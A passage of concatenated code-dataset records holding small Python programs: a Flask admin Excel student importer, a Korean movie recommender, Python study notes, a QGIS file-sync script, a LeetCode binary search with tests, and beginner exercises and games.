otra funcion con la misma xls\" % (url_path, \"falso\")\n \n return \"\"\"Subir Excel\n

Selecciona el archivo

\n
\n \n \n
\"\"\"\n \n #Referencias filas excel\n # a b c d e f g h i j k l m n o p q r s t u v w x y z aa ab ac ad ae af ag\n # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 \n @expose('/import/process/')\n def process_file(self, filename):\n from xlrd import open_workbook, xldate_as_tuple\n filas = 0\n filepath = os.path.join('/tmp', filename)\n wb = open_workbook(filepath)\n sheet = wb.sheets()[0]\n filas_importadas = 0\n for row in range(1, sheet.nrows):\n rut = str(sheet.cell(row, 0).value)\n if Alumno.objects(rut=rut).first() == None:\n nombres = str(sheet.cell(row, 1).value)\n apel_pa = str(sheet.cell(row, 2).value)\n apel_ma = str(sheet.cell(row, 3).value)\n sexo = str(sheet.cell(row, 4).value)\n email = str(sheet.cell(row, 5).value)\n telefono = str(sheet.cell(row, 6).value)\n calle = str(sheet.cell(row, 7).value)\n numero = str(sheet.cell(row, 8).value)\n comuna = str(sheet.cell(row, 9).value)\n curso = str(sheet.cell(row, 10).value)\n colegio = str(sheet.cell(row, 11).value)\n colegio_calle = str(sheet.cell(row, 12).value)\n colegio_numero = str(sheet.cell(row, 13).value)\n colegio_comuna = str(sheet.cell(row, 14).value)\n alumno = Alumno()\n alumno.rut = rut\n alumno.encrypt_password(rut)\n alumno.nombres = nombres\n alumno.apellido_paterno = apel_pa\n alumno.apellido_materno = apel_ma\n if sexo == 'M':\n alumno.sexo = 'MASCULINO'\n if sexo == 'F':\n alumno.sexo = 'FEMENINO'\n if curso == 'C':\n ciencias = Curso.objects(nombre=\"Ciencias 2019\").first()\n if ciencias != None:\n alumno.curso = ciencias.id\n if curso == 'H':\n historia = Curso.objects(nombre=\"Historia 2019\").first()\n if historia != None:\n alumno.curso = historia.id\n alumno.email = email\n alumno.telefono = telefono\n direccion = Direccion()\n direccion.calle = calle\n direccion.numero = numero\n direccion.comuna = comuna\n alumno.direccion = direccion\n colegio_alumno = Colegio.objects(nombre = colegio).first()\n if colegio_alumno != None:\n alumno.colegio = colegio_alumno.id\n else:\n colegio_alumno = Colegio()\n colegio_alumno.nombre = colegio\n direccion = Direccion()\n direccion.calle = colegio_calle\n direccion.numero = colegio_numero\n direccion.comuna = colegio_comuna\n colegio_alumno.direccion = direccion\n colegio_alumno.save()\n alumno.colegio = colegio_alumno.id\n alumno.imagen = \"default\"\n alumno.puntaje_ingreso = 500\n alumno.save()\n filas_importadas += 1\n for colegio in Colegio.objects().all():\n colegio.updateCantEstudiantes()\n for curso in Curso.objects().all():\n curso.updateCantEstudiantes()\n return \"%d Fila importadas\" % filas_importadas\n\n\ndef add_views(admin):\n \n admin.add_view(ModelView(Curso, \"Cursos\", category=\"Curso\"))\n admin.add_view(ModelView(Asignatura, \"Asignaturas\", category=\"Curso\"))\n admin.add_view(ModelView(Administrador, \"Administradores de Institucion\", category=\"Perfiles\"))\n admin.add_view(ModelView(Profesor, \"Profesores\", category=\"Perfiles\"))\n admin.add_view(ModelView(Alumno, \"Alumnos\", category=\"Perfiles\"))\n admin.add_view(ModelView(Apoderado, \"Apoderados\", category=\"Perfiles\"))\n admin.add_view(ModelView(Evaluacion, \"Evaluaciones Realizadas\", category=\"Evaluacion\"))\n admin.add_view(ModelView(Topico, \"Topicos\", category=\"Evaluacion\"))\n admin.add_view(ModelView(Prueba, \"Pruebas\", category=\"Evaluacion\"))\n admin.add_view(ModelView(Colegio, \"Colegios\"))\n admin.add_view(ModelView(Alerta, \"Alertas\"))\n admin.add_view(ModelView(Observacion, \"Observaciones 
Alumnos\",category=\"Observaciones\"))\n admin.add_view(ModelView(ObservacionProfesor, \"Observaciones Profesor\",category=\"Observaciones\"))\n admin.add_view(ModelView(Evento, \"Eventos\",category=\"Eventos\"))\n admin.add_view(ModelView(Asistencia, \"Asistencias\", category=\"Asistencia y justificaciones\"))\n admin.add_view(ModelView(Justificacion, \"Justificaciones\", category=\"Asistencia y justificaciones\"))\n admin.add_view(ModelView(Archivo,\"Archivos\"))\n admin.add_view(ModelView(Video,\"Videos\"))\n admin.add_view(ViewWithMethodViews(\"Importador\"))\n\nadd_views(admin)\n\nif __name__ == '__main__':\n app.run(host=app.config.get('HOST', '127.0.0.1'),\n port=app.config.get('PORT', 4000))","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"528319557","text":"import pandas as pd\r\nimport warnings;warnings.filterwarnings('ignore')\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nfrom konlpy.tag import *\r\nimport numpy as np\r\nimport json\r\n\r\ndef preprocess(text):\r\n okt = Okt()\r\n stop_words = ['은', '는', '이', '가', '을', '를', '좀', '잘', '그', '되다', '의', '이다',\r\n '과', '도', '없다', '으로', '수', '에', '와', '한', '하다', '들', '의']\r\n token_str = ''\r\n text = okt.morphs(text, stem=True)\r\n # 각 줄거리를 어간 추출한 후 접미사, 접속사, 동사 제거 후 공백으로 이어 붙임\r\n for token in text:\r\n if token not in stop_words:\r\n token_str += ' ' + token\r\n return token_str\r\n\r\nmovies = pd.read_csv('contentlast.csv', encoding='cp949')\r\nmovies_df = movies[['movie_name', 'movie_content', 'url']].fillna('') #결측행 제거\r\n\r\nmovies_df['content'] = movies_df['movie_content'].apply(lambda x:preprocess(x)) #데이터 전처리\r\n\r\ncount_vect = CountVectorizer(min_df=1, ngram_range=(1,1))\r\n# min_df : 특정 단어가 출현하는 문서의 최소 갯수(줄거리에 1번이라도 등장하면 토큰으로 사용)\r\n# ngram_range : 단어의 묶음을 1개부터 1개까지 설정\r\nmovies_vect = count_vect.fit_transform(movies_df['content']) # BOW 인코딩 벡터 반환\r\n\r\ncosine_sim = cosine_similarity(movies_vect, movies_vect) # 각 벡터들 사이의 코사인 유사도 구함\r\n\r\nindices = pd.Series(movies_df.index, index=movies_df['movie_name'])\r\n\r\ndef recommendation(title, cosine_sim=cosine_sim):\r\n # 전체 영화에 대해 입력한 영화와의 유사도를 구한 후 리스트에 넣음\r\n sim_scores = list(enumerate(cosine_sim[indices[title]]))\r\n # 유사도 내림차순으로 영화 정렬\r\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\r\n\r\n sim_scores = sim_scores[0:11] # 0번은 자기 자신, 1번부터 10번까지 유사도 높은 영화 10개 가져옴\r\n movie_indices = [i[0] for i in sim_scores] # 10개의 영화들의 인덱스 가져옴\r\n\r\n return movies_df['movie_name'].iloc[movie_indices] # 인덱스로 영화 찾아서 반환\r\n\r\nmovies_name = movies['movie_name'].tolist()\r\nmovie_all = {}\r\nfor x in movies_name:\r\n movie_index = recommendation(x).index\r\n movie_recom = recommendation(x).values\r\n movies_url = movies_df.iloc[movie_index, 2].values\r\n movie_dic = {}\r\n for y in range(11):\r\n movie_dic[movie_recom[y]] = movies_url[y]\r\n movie_all[x] = movie_dic\r\n\r\nwith open('movie_recommendation3.json', 'w', encoding='utf-8') as make_file:\r\n json.dump(movie_all, make_file, ensure_ascii=False, indent=\"\\t\")\r\n\r\n\r\n\r\n","sub_path":"movie_recommendation.py","file_name":"movie_recommendation.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"78161620","text":"import os\nimport sys\nfrom pathutil import *\nfrom parseimage import *\nfrom 
+{"seq_id":"63726897","text":"\"\"\"\n2) Escribir una función recursiva que reciba una lista y un parámetro n, y devuelva otra\nlista con los elementos de la lista replicados esa cantidad n de veces.\nPor ejemplo, replicar ([1, 3, 3, 7], 2) debe devolver ([1, 1, 3, 3, 3, 3, 7, 7])\n\"\"\"\n\n\ndef replicar(lista, n):\n    \"\"\"\n    Recibe una lista y la cantidad de veces que debe replicarse cada elemento\n    :param lista: lista de elementos iguales\n    :param n: entero positivo\n    :return: nueva lista con elementos replicados n veces\n    \"\"\"\n    nueva_lista = []\n\n    if len(lista) < 1:\n        return nueva_lista\n\n    for i in range(n):\n        nueva_lista.append(lista[0])\n\n    return nueva_lista + replicar(lista[1:], n)\n\n\n# ejecucion\nlista1 = [1, 3, 3, 7]\nlista2 = replicar(lista1, 2)\nprint(lista1)\nprint(lista2)","sub_path":"Parcialitos/Cuarto/ejercicio2.py","file_name":"ejercicio2.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"288300716","text":"game_dictionary = {\n    \"home\": {\n        \"team_name\":\"Brooklyn Nets\",\n        \"colors\": [\"Black\", \"White\"],\n        \"players\": {\n            \"Alan Anderson\": {\n                \"number\":0,\n                \"shoe\":16,\n                \"points\":22,\n                \"rebounds\":12,\n                \"assists\":12,\n                \"steals\":3,\n                \"blocks\":1,\n                \"slam_dunks\":1\n            },\n            \"Reggie Evans\": {\n                \"number\":30,\n                \"shoe\":14,\n                \"points\":12,\n                \"rebounds\":12,\n                \"assists\":12,\n                \"steals\":12,\n                \"blocks\":12,\n                \"slam_dunks\":7\n            },\n            \"Brook Lopez\": {\n                \"number\":11,\n                \"shoe\":17,\n                \"points\":17,\n                \"rebounds\":19,\n                \"assists\":10,\n                \"steals\":3,\n                \"blocks\":1,\n                \"slam_dunks\":15\n            },\n            \"Mason Plumlee\": {\n                \"number\":1,\n                \"shoe\":19,\n                \"points\":26,\n                \"rebounds\":12,\n                \"assists\":6,\n                \"steals\":3,\n                \"blocks\":8,\n                \"slam_dunks\":5\n            },\n            \"Jason Terry\": {\n                \"number\":31,\n                \"shoe\":15,\n                \"points\":19,\n                \"rebounds\":2,\n                \"assists\":2,\n                \"steals\":4,\n                \"blocks\":11,\n                \"slam_dunks\":1\n            }\n        }\n    },\n    \"away\": {\n        \"team_name\":\"Charlotte Hornets\",\n        \"colors\":[\"Turquoise\",\"Purple\"],\n        \"players\": {\n            \"Jeff Adrian\": {\n                \"number\":4,\n                \"shoe\":18,\n                \"points\":10,\n                \"rebounds\":1,\n                \"assists\":1,\n                \"steals\":2,\n                \"blocks\":7,\n                \"slam_dunks\":2\n            },\n            \"Bismak Biyombo\": {\n                \"number\":0,\n                \"shoe\":16,\n                \"points\":12,\n                \"rebounds\":4,\n                \"assists\":7,\n                \"steals\":7,\n                \"blocks\":15,\n                \"slam_dunks\":10\n            },\n            \"DaSagna Diop\": {\n                \"number\":2,\n                \"shoe\":14,\n                \"points\":24,\n                \"rebounds\":12,\n                \"assists\":12,\n                \"steals\":4,\n                \"blocks\":5,\n                \"slam_dunks\":5\n            },\n            \"Ben Gordon\": {\n                \"number\":8,\n                \"shoe\":15,\n                \"points\":33,\n                \"rebounds\":3,\n                \"assists\":2,\n                \"steals\":1,\n                \"blocks\":1,\n                \"slam_dunks\":0\n            },\n            \"Brendan Haywood\": {\n                \"number\":33,\n                \"shoe\":15,\n                \"points\":6,\n                \"rebounds\":12,\n                \"assists\":12,\n                \"steals\":22,\n                \"blocks\":5,\n                \"slam_dunks\":12\n            }\n        }\n    }\n}\n\n\ndef game_dict():\n    return game_dictionary\n\ndef find_player_stat(name,stat):\n    for team, values in game_dict().items():\n        if name in game_dict()[team]['players'].keys():\n            return game_dict()[team]['players'][name][stat]\n    return None\n\ndef find_team_stat(name,stat):\n    for team, values in game_dict().items():\n        if name == game_dict()[team]['team_name']:\n            return game_dict()[team][stat]\n    return None\n\ndef num_points_scored(name):\n    return find_player_stat(name,'points')\n\nprint(num_points_scored('Ben Gordon'))\n\ndef shoe_size(name):\n    return find_player_stat(name,'shoe')\nprint(shoe_size('Brendan Haywood'))\n\ndef team_colors(name):\n    return find_team_stat(name,'colors')\nprint(team_colors('Brooklyn Nets'))\n\ndef team_names():\n    team_name=[game_dict()[team]['team_name'] for team in game_dict()]\n    return team_name\nprint(team_names())\n\ndef player_numbers(team_name):\n    numbers = [ game_dict()[team]['players'][player]['number'] for team in game_dict() for player in game_dict()[team]['players'] if game_dict()[team]['team_name']==team_name]\n    return numbers\nprint(player_numbers('Brooklyn Nets'))\n\ndef player_stats(name):\n    for team in game_dict():\n        if name in game_dict()[team]['players'].keys():\n            return game_dict()[team]['players'][name]\n    return None\nprint (player_stats('Jeff Adrian'))\n\ndef big_shoe_rebounds():\n    max=0\n    big_shoe=[]\n    rebound=0\n    for team in game_dict():\n        for player in game_dict()[team]['players']:\n            if game_dict()[team]['players'][player]['shoe']>max:\n                big_shoe=[player]\n                max=game_dict()[team]['players'][player]['shoe']\n                rebound=game_dict()[team]['players'][player]['rebounds']\n            elif game_dict()[team]['players'][player]['shoe']==max:\n                big_shoe.append(player)\n    return rebound\nprint(big_shoe_rebounds())\n\ndef most_points_scored():\n    max=0\n    MVP=[]\n    for team in game_dict():\n        for player in game_dict()[team]['players']:\n            if game_dict()[team]['players'][player]['points']>max:\n                MVP=[player]\n                max=game_dict()[team]['players'][player]['points']\n            elif game_dict()[team]['players'][player]['points']==max:\n                MVP.append(player)\n    return MVP\nprint(most_points_scored())\n\ndef winning_team():\n    max=0\n    winner=[]\n    for team, values in game_dict().items():\n        score=0\n        for player in game_dict()[team]['players']:\n            score+=game_dict()[team]['players'][player]['points']\n        if score>max:\n            winner=game_dict()[team]['team_name']\n            max=score\n        elif score==max:\n            winner.append(game_dict()[team]['team_name'])\n    return winner\nprint(winning_team())\n\ndef player_with_longest_name():\n    max=0\n    longest=[]\n    for team in game_dict():\n        for player in game_dict()[team]['players']:\n            if len(player)>max:\n                longest=[player]\n                max=len(player)\n            elif len(player)==max:\n                longest.append(player)\n    return longest\nprint(player_with_longest_name())\n\ndef long_name_steals_a_ton():\n    max = find_player_stat(player_with_longest_name()[0],'steals')\n    for team in game_dict():\n        for player in game_dict()[team]['players']:\n            if game_dict()[team]['players'][player]['steals']>max:\n                return False\n    return True\nprint(long_name_steals_a_ton())\n\ndef good_practices():\n    for location, team_stats in game_dict().items():\n        # are you ABSOLUTELY SURE what 'location' and 'team_stats' are? use pdb.set_trace() to find out!\n        import pdb; pdb.set_trace()\n        for stats, data in team_stats.items():\n            # are you ABSOLUTELY SURE what 'stats' and 'data' are? use pdb.set_trace() to find out!\n            import pdb; pdb.set_trace()\n            # what is 'data' at each level of the for loop block? when will we be able to iterate through a list?\n            # When would the following line of code break?\n            for item in data:\n                print(item)\n","sub_path":"dictionaryballBonus.py","file_name":"dictionaryballBonus.py","file_ext":"py","file_size_in_byte":7180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"464339321","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n# 第一行注释是为了告诉Linux/OS X系统,这是一个Python可执行程序,Windows系统会忽略这个注释;\r\n# 第二行注释是为了告诉Python解释器,按照UTF-8编码读取源代码,否则,你在源代码中写的中文输出可能会有乱码。\r\n\r\n#整型,浮点型,字符型,布尔,空值(None)\r\n\r\n#字符串\r\nprint(\"I'm Carlos!\") #引号重复\r\nprint('I\\'m \\\"Carlos\\\"') #转义\r\nprint('\\\\ \\nIm \\tcarlos') #\\n换行 \\t制表符\r\nprint(r'\\\\\\\\t\\\\n\\\\') #r''内部的字符串默认不转义\r\nprint('''line1\r\nline2\r\nline3''') #'''...'''多行输出\r\n# True False and or not \r\n# None是python里一种特殊的空值 没有意义的 不能理解为0\r\n# 常量表示不能改变的量 一般用全部大写字母表示\r\nPI = 3.14159265359\r\n# 精确除法 \r\n10 / 3\r\n# 地板除法 取整\r\n10 // 3\r\n# 取余数\r\n10 % 3\r\n# 用ord()函数获取字符的证书表示\r\nord('A')\r\nord('中')\r\n# 用chr()函数把字符整数表示为对应的字符\r\nchr(66)\r\nchr(25991)\r\n\r\n# 用b''或者b\"\"表示bytes类型数据\r\nx = b'ABC'\r\n\r\n# 以Unicode表示的str通过encode()方法可以编码为指定的bytes\r\n'ABC'.encode('ascii')\r\n'中文'.encode('utf-8')\r\n\r\n# 要把bytes变为str,就需要用decode()方法\r\nb'ABC'.decode('ascii')\r\nb'\\xe4\\xb8\\xad\\xe6\\x96\\x87'.decode('utf-8')\r\n# 如果bytes中只有一小部分无效的字节,可以传入errors='ignore'忽略错误的字节\r\nb'\\xe4\\xb8\\xad\\xff'.decode('utf-8', errors='ignore')\r\n# 要计算str包含多少个字符,可以用len()函数\r\nlen('zhongwen')\r\nlen('中文')\r\n\r\n# %运算符就是用来格式化字符串的。在字符串内部,%s表示用字符串替换,%d表示用整数替换\r\n# ,有几个%?占位符,后面就跟几个变量或者值,顺序要对应好。如果只有一个%?,括号可以省略\r\n# ,字符串里面的%是一个普通字符怎么办?这个时候就需要转义,用%%来表示一个%:\r\n'Hello, %s' % 'world'\r\n'Hi, %s, you have $%d.' % ('Michael', 1000000)\r\n'growth rate: %d %%' % 7\r\n \r\n# 另一种格式化字符串的方法是使用字符串的format()方法,它会用传入的参数依次替换字符串内的占位符{0}、{1}……,\r\n'Hello, {0}, 成绩提升了 {1:.1f}%'.format('小明', 17.125)\r\n\r\n# list Python内置的一种数据类型是列表:list。list是一种有序的集合,可以随时添加和删除其中的元素。\r\nclassmates = ['Michael', 'Bob', 'Tracy']\r\n\r\n# dict 字典\r\nd = {'michael':95,'bob':56,'tom0':23}\r\nd['michael']\r\n# 通过key值设置字典值 一个key值只能设置一个value值后面的会覆盖前面的值 没有key值取值时会报错 \r\nd['abel'] = 54\r\nd['abel']\r\n\r\n# 要判断key值是否存在有两个方式\r\n# 1.用in来判断key是否存在\r\n# 2.用dict提供的get()方法 如果key不存在会返回None 返回None的时候交互环境不返回结果 或者返回指定的值\r\n'thomas' in d # False\r\nd.get('thomas')\r\nd.get('thomas',-1)\r\n\r\n# 删除一个key用pop(key)方法对应的value也会从dict中删除\r\nd.pop('bob') # 56\r\nd \r\n\r\n# dict是用空间换时间的一种处理方式\r\n\r\n# set 一组key的集合 key不能重复 创建一个key需要提供一个list作为输入集合\r\ns = set([1,2,3])\r\ns # {1,2,3}\r\n\r\n# 通过add(key)方法可以添加元素到set中\r\ns.add(4)\r\n# 通过remove(key)方法可以添加元素到set中\r\ns.remove(4)\r\n\r\n#set可以看成数学意义上的无序和无重复元素的集合,因此,两个set可以做数学意义上的交集、并集等操作\r\ns1 = set([1,2,3])\r\ns2 = set([4,2,3])\r\ns1 & s2 # {2,3}\r\ns1 | s2 # {1,2,3,4}\r\n# set与dict的唯一区别仅仅在于没有存储对应的value.\r\n\r\n","sub_path":"variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"332034354","text":"from tkinter import *\n\njanela = Tk()\njanela.title(\"Widget Entry\")\n\ndef btEntry():\n    lb2['text'] = ed.get()\n\nlb = Label(janela,text=\"Insira seu nome\")\nlb.place(x=100,y=70)\n\nlb2 = Label(janela,text=\"\")\nlb2.place(x=100,y=170)\n\nbt = Button(janela,text=\"Confirmar\",command=btEntry)\nbt.place(x=100,y=130)\n\ned = Entry(janela)\ned.place(x=100,y=100)\n\n\njanela.geometry(\"300x300+300+300\")\njanela.mainloop()\n","sub_path":"PythonTKinter/WidgetEntry.py","file_name":"WidgetEntry.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"150001690","text":"from PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\nimport os, sys, shutil, re\n\ngeopackage_name = \"RoadDB.gpkg\"\nmap_name = \"Roadway.qgs\"\n\nnetwork_dir = os.path.join(\"F:\", os.sep, \"ROADWAY\", \"WCarey\", \"GIS\")\nlocal_pkg_dir = os.path.join(os.path.expanduser(\"~\"), \"MY Documents\", \"QGIS-Local\")\n\ndef read_file(file):\n    f = open(file, \"r\")\n    content = f.read()\n    f.close()\n\n    if content == '':\n        result = 0\n    else:\n        result = float(content)\n    return result\n\ndef create_or_update_file(file, value):\n    f = open(file, \"w+\")\n    f.write(str(value))\n    f.close()\n    return\n\ndef is_newer_package_available(local_file, network_file):\n    version_file = re.sub(r\"\\.\\D+\", \".ver\", local_file)\n    if not os.path.exists(version_file):\n        create_or_update_file(version_file, 0)\n\n    local_date = read_file(version_file)\n    network_file_date = os.path.getmtime(network_file)\n    if local_date < network_file_date:\n        return True\n    else:\n        return False\n\ndef update_local_version(local_file, network_file):\n    version_file = re.sub(r\"\\.\\D+\", \".ver\", local_file)\n    network_file_date = os.path.getmtime(network_file)\n    create_or_update_file(version_file, network_file_date)\n    return\n\ndef update_local(filename):\n    network_file = os.path.join(network_dir, filename)\n    local_file = os.path.join(local_pkg_dir, filename)\n\n\n    if os.path.exists(network_file):\n        if is_newer_package_available(local_file, network_file):\n            if filename == map_name:\n                reply = QtWidgets.QMessageBox.question(None, \"Update?\", 'A new version of the map document was found. Do you wish to update? \\nWarning: This will overwrite your local preferences but give you access to new layers.', QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No)\n            else:\n                reply = QtWidgets.QMessageBox.Yes\n            if reply == QtWidgets.QMessageBox.Yes:\n                update_local_version(local_file, network_file)\n                try:\n                    os.remove(local_file)\n                except FileNotFoundError:\n                    pass\n                except:\n                    print('Unable to remove old local file. Please close all other QGIS instances.')\n                shutil.copy2(network_file, local_file)\n            #else:\n                #QtWidgets.QMessageBox.information(None, \"INFO\", 'You have the newest version of '+ filename +' already.')\n        \n    else:\n        QtWidgets.QMessageBox.information(None, \"INFO\", 'Unable to find ' + filename + ' on the network, using local one for now. \\nQGIS will check next time you start the program. \\nIf this problem persists, please contact Will Carey.')\n\n\nif not os.path.exists(local_pkg_dir):\n    os.mkdir(local_pkg_dir)\n\nupdate_local(geopackage_name)\nupdate_local(map_name)\n","sub_path":"network/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"284407775","text":"\"\"\"\nSearch Insert Position\n\nGiven a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.\n\nYou may assume no duplicates in the array.\n\nHere are few examples.\n[1,3,5,6], 5 --> 2\n[1,3,5,6], 2 --> 1\n[1,3,5,6], 7 --> 4\n[1,3,5,6], 0 --> 0\n\nSubscribe to see which companies asked this question\n\nHide Tags Array Binary Search\nHide Similar Problems (E) First Bad Version\n\n\n\"\"\"\n\nimport unittest\n\n\nclass Solution(object):\n    def searchInsert(self, nums, target): #52ms, 65.72%\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: int\n        \"\"\"\n        if nums is None or len(nums) == 0:\n            return 0\n        left = 0\n        right = len(nums) - 1\n        while 0<=left<=right<len(nums):\n            mid = (left+right) / 2\n            if target == nums[mid]:\n                return mid\n            elif target > nums[mid]:\n                left = mid + 1\n            else:\n                right = mid - 1\n        mid = (left+right) / 2 + 1\n        return mid\n\n\n\nclass SolutionTester(unittest.TestCase):\n    def setUp(self):\n        self.sol = Solution()\n\n    def test_case1(self):\n        nums = [1,3,5,6]\n        target = 5\n        answer = 2\n        result = self.sol.searchInsert(nums, target)\n        self.assertEqual(answer, result)\n\n    def test_case2(self):\n        nums = [1, 3, 5, 6]\n        target = 2\n        answer = 1\n        result = self.sol.searchInsert(nums, target)\n        self.assertEqual(answer, result)\n\n    def test_case3(self):\n        nums = [1,3,5,6]\n        target = 7\n        answer = 4\n        result = self.sol.searchInsert(nums, target)\n        self.assertEqual(answer, result)\n\n    def test_case4(self):\n        nums = [1,3,5,6]\n        target = -1\n        answer = 0\n        result = self.sol.searchInsert(nums, target)\n        self.assertEqual(answer, result)\n\ndef main():\n    suite = unittest.TestLoader().loadTestsFromTestCase(SolutionTester)\n    unittest.TextTestRunner(verbosity=2).run(suite)\n\nif __name__ == \"__main__\":\n    main()","sub_path":"misc/search_insert _position.py","file_name":"search_insert _position.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"241463081","text":"#10 - Faça um Programa para leitura de três notas parciais de um aluno. O programa deve calcular a média alcançada por aluno e presentar:\n#- A mensagem \"Aprovado\", se a média for maior ou igual a 7, com a respectiva média alcançada;\n#- A mensagem \"Reprovado\", se a média for menor do que 7, com a respectiva média alcançada;\n#- A mensagem \"Aprovado com Distinção\", se a média for igual a 10.\n\nnota1 = float(input(\"Digite a primeira nota: \"))\nnota2 = float(input(\"Digite a segunda nota: \"))\nsoma = (nota1 + nota2) /2\nif soma >= 7 and soma < 10:\n    print(\"Aprovado\")\nelif soma == 10:\n    print(\"Aprovado com Distinção\")\nelse:\n    print(\"Reprovado\")\n    \nif soma <= 10:\n    media = int(input(\"Deseja ver a média? (1)-Sim (2)-Não: \"))\n    if media == 1:\n        print(\"Sua média é:\", soma)\n    elif media == 2:\n        print(\"programa encerrado\")\n    else:\n        print(\"Error\")\nelse:\n    print(\"Ops, operação inválida\")\n\n","sub_path":"questao10_lista4_média.py","file_name":"questao10_lista4_média.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"70091663","text":"import random\ndef judge(number):\n    while not number.isdigit():\n        print(\"请输入一个[1,100]范围的整数 invalid literal for int() with 10:'%s'\" % number)\n        number = input(\"您猜的数是?\")\n    num = int(number)\n    if (num<0) or (num>100):\n        print(\"请输入一个[1,100]范围的整数\")\n        number = input(\"您猜的数是?\")\n        judge(number)\n    return num\nT = \"Y\"\nwhile T == \"Y\" or T == \"y\":\n    num = random.randint(1,100)\n    for i in range(0,5):\n        if i != 4:\n            count = str(6-i)\n            number = input(\"您猜的数是?\")\n            number = judge(number)\n            if number == num:\n                print(\"您猜对了\")\n                break\n            else:\n                if number > num:\n                    print(\"您猜的数太大了!\")\n                else:\n                    print(\"您猜的数太小了!\")\n        else:\n            print (\"您已经猜了4次,要猜的数字是:\",num)\n            break\n    T = input(\"继续猜数字游戏请输入y/Y,输入其它任意键退出:\")\n","sub_path":"project10/project/18301030025.py","file_name":"18301030025.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"511476449","text":"#Try and Except---------------------------------\n# Chapter 6.6\n#\n# print(\"NO ERROR HANDLING-------------------------\")\n# fn = int(input(\"what's your favorite number? \"))\n#\n# #what could go wrong?\n# #\n# print(\"WHILE LOOP--------------------------------\")\nfn = input(\"what's your favorite number? \")\nwhile not fn.isnumeric():\n    fn = input(\"what's your favorite number? \")\nfn = int(fn)\n#\n# # #how have we fixed it in the past?\n# #\n# #try/Except\n# print(\"TRY EXCEPT #1--------------------------------\")\n# try:\n#     fn = int(input(\"what's your favorite number? \"))\n# except:\n#     print(\"That's not a number, I'll pretend you said 7.\")\n#     fn = 7\n#\n# # #or\n# print(\"TRY EXCEPT #2--------------------------------\")\n# while True:\n#     try:\n#         fn = int(input(\"what's your favorite number? \"))\n#         break\n#     except:\n#         print(\"That's not a number\")\n\n#\n# print(\"\\n\\nFILE ISSUES-----------------------------------\")\n#reader = open(\"Chelsea.txt\", \"r\")\n# #what can go wrong?\n#\n# try:\n#     filename = input(\"filename: \")\n#     reader = open(filename, \"r\")\n# except:\n#     print(\"YOU MESSED UP. GO CHECK YOUR FILE LOCATION.\")\n\n# while True:\n#     try:\n#         filename = input(\"filename: \")\n#         reader = open(filename, \"r\")\n#         break\n#     except:\n#         print(\"YOU MESSED UP. GO CHECK YOUR FILE LOCATION.\")\n\n#\n#\n#List Comprehension\n# Chapter 7.11\n# a = [\"A\",\"B\",\"C\",\"D\",\"E\"]\n#\n# b = []\n# for i in a:\n#     b.append(i.lower())\n# print(b)\n#\n# b2 = [i.lower() for i in a]\n# print(b2)\n# b2 = [i.lower() for i in a]\n# print(b2)\n#\nc = [\"The quick brown fox A\", \"Mary had a little lamb\", \"New in Town\"]\nvows = []\nfor s in c:\n    for letter in s:\n        if letter.lower() in \"aeiou\":\n            vows.append(letter)\n\nprint(vows)\nvows2 = [letter for s in c for letter in s if letter.lower() in \"aeiou\"]\nprint(vows2)\n\n\n\n\n\n\n# vows2= [letter for s in c for letter in s if letter.lower() in \"aeiou\"]\n# print(vows2)\n#\n#\n#Classes\n# Chapter 11 (all)\nclass Cat:\n    def __init__(self,name):\n        self.name = name\n        print(\"MEOW, I'm \", self.name)\n    def meow(self):\n        print(self.name + \": MEOW!\")\nBlake = Cat(\"Blake\")\nJohn = Cat(\"John\")\nBlake.meow()\n#Functions\n# Chapters 5 and 8\n","sub_path":"InClass/Review.py","file_name":"Review.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"173677242","text":"import turtle;\n\ndef draw_squre(some_turtle) :\n    for i in range(1, 5) :\n        some_turtle.forward(100);\n        some_turtle.right(90);\n\n\ndef draw_art() :\n    window = turtle.Screen();\n    window.bgcolor(\"red\");\n\n    turtle1 = turtle.Turtle();\n    turtle1.shape(\"turtle\");\n    turtle1.color(\"yellow\");\n    turtle1.speed(2);\n    for i in range(1, 37):\n        draw_squre(turtle1);\n        turtle1.right(10);\n\n\n\n\n\n\n    window.exitonclick();\n\n\n\n\n\n\ndraw_art();","sub_path":"pythonCrashcourseExerciseAnswer/myPythonStudy/draw_python.py","file_name":"draw_python.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
